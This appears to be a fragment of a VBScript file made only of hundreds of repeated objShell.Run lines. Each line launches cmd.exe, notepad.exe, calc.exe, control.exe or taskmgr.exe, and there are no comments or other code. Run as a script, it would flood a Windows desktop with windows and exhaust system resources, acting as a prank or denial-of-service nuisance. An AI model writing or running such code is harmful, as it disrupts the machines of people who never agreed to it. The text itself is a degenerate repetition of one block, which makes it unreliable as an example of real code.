objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
